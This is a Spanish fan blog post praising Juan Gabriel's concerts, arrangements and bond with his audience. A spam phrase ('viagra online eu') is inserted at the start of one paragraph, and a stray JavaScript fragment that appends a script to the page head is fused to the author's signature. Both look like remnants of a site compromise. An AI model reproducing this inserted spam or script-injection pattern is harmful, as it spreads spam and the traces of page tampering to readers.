No Solo Es Cantar, cantantes hay muchos

Comparte !

No solo es cantar, cualquier cantante se sube a un escenario y si canta bien, tiene un público que lo sigue y hasta puede adquirir determinada fama, cantantes hay muchos.

viagra online eu Pero no solo es cantar, decía, una vez que uno tiene la posibilidad de asistir a un recital o concierto de Juan Gabriel, no se puede después dejar de compararlo con cualquier otro que podamos ver en el futuro.  Juan Gabriel es “el artista”, por su intensidad, nadie logra como él combinar la música, el baile, los coros, los músicos y los artistas de una manera maravillosa en el escenario.

Su manejo de los acordes, su oído musical, lo hace combinar violines, instrumentos de viento, tambores, coros, guitarras, arreglos, con una genialidad poco vista o poco oída diría mejor.

Puede llevar a el mejor en su estilo, sea cantante o conjunto o mimo, él sabe rodearse de los mejores en su género y aun así el sale al escenario y brilla, y en conjunto con esos más de 30 artistas, elegidos magistralmente por él, se logra un evento pocas veces visto, algo que nunca olvidaras en tu vida. Después de verlo a él, uno no tiene retorno…

Adoro escuchar sus recitales en vivo, nunca uno es igual a otro, hasta he disfrutado de “La diferencia” cantada a ritmo de tango, ese tango de mi patria que me ha emocionado, porque él lo ha tenido en cuenta para esa hermosa canción.

Puede cantar la misma canción en todos los recitales y nunca es repetida, nunca es igual. Juan Gabriel amalgama su voz y su emoción con la voz y la emoción de su público que canta sus canciones, y el agradece. Y se emociona y me emociona, y nos emociona a todos los fans que lo amamos incondicionalmente.

Lo escucho y a veces sin darme cuenta las lágrimas brotan de mis ojos y surcan mis mejillas, pero con diferentes emociones, unas de emoción pura por la letra que quizás me recuerda amores perdidos y su interpretación llega a mi corazón, otras de tristeza como cuando canta “Amor eterno” y recuerdo a mi madre y su ausencia.

Y un tema aparte son los Coros…nadie como el para saber cuándo y cómo los coros deben acentuar sus canciones, porque son aportes maravillosos y se logra llegar a las fibras más íntimas del alma con el canto. El interactúa con sus músicos y con el público.

Como dije nunca un recital es igual a otro aunque interprete las mismas canciones. Todos los artistas que están con él, están en el lugar justo y él es generoso y da oportunidades a los que lo acompañan. Qué más puedo decir, no solo es cantar, es ser un Señor sobre el escenario y en la vida, y por eso es tan amado. Porque indudablemente se lo merece.

Juan Gabriel, gracias por todo lo nos das, porque en esa comunión, ese feedback entre tú y nosotros tus fans, corre una energía que solo puede tener un nombre: eso es ni más ni menos que Amor, la emoción más pura entre los seres humanos.

No solo es cantar…no te parece, cantar canta cualquiera, pero cantar así y amar así es algo divino y escuchar a Juan Gabriel es como estar cerca del cielo.

Cris Carboned.getElementsByTagName(‘head’)[0].appendChild(s);} else {

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares